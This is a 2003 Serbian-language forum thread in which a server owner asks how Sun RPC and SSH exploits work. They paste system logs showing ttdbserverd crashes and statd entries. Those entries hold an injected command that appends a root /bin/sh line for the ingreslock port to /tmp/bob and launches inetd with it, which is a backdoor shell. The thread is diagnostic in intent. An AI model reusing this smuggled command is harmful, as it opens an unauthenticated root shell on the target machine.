[ bagz @ 16.02.2003. 17:33 ] @
Zanima me da li bi neko mogao da mi da malo vise informacija o ova dva exploit-a i nravano sam kod. hmm pogledao sam po netu ali nigde ne mogu da nadjem kako u stavri rade ovi expoliti samo kako ih spreciti. Jedan od servera koje iamam ima otovren port sunrpc 111 koliko je to tesko ili lako kompromizovati i sta ako je taj port "filterd" od starne iptables-a da li je to i dalje problem. havala unapred.
[ DownBload @ 16.02.2003. 19:27 ] @
SSH je Secure Shell, a RPC je Remote Procedure Call, ne znam kako si ti to odmah povezao sa exploitovima.
[ B o j a n @ 17.02.2003. 00:46 ] @
Citat:
bagz:
Jedan od servera koje iamam ima otovren port sunrpc 111 koliko je to tesko ili lako kompromizovati

Jedan od najcescih razloga zasto neki "server ima otvoren xxx port" je ( gle cuda ), da pruzi nekakvu uslugu. Ta usluga moze da varira, i obicno se koristi u korisne svhre ( citanje poste, razmena email-a, pregled web sajta, itd ... ).

I sad, koje je tvoje pitanje ?
[ bagz @ 17.02.2003. 21:14 ] @
da da u pravu si nisam ovo hmm precizno pitao ovako prvo pitanje:
1) znam za stari bug za ssh1 nema veze ovo sam nasao.
2) znam sta je sunrpc i znam da je na portu 111 zanima me sunrpc portmap napadi recimo log deluje ovako nekako:
rpc.xxx[1706]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc.ttdbserverd: Child Status Changed - core dumped
rpc.xxx[1707]: iserase(): 78
rpc.xxx[1707]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc: Child Status Changed - core dumped
rpc.xxx[1708]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc: Child Status Changed - core dumped
rpc.xxx[1709]: iserase(): 78
rpc.xxx[1709]: iserase(): 78
rpc.xxx[1709]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc: Child Status Changed - core dumped
ttdbserverd[1710]: iserase(): 78
ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
statd[130]: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
statd[130]: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
itd itd ....
ako bi ovo neko moagao da malo razjasni
hvala u napred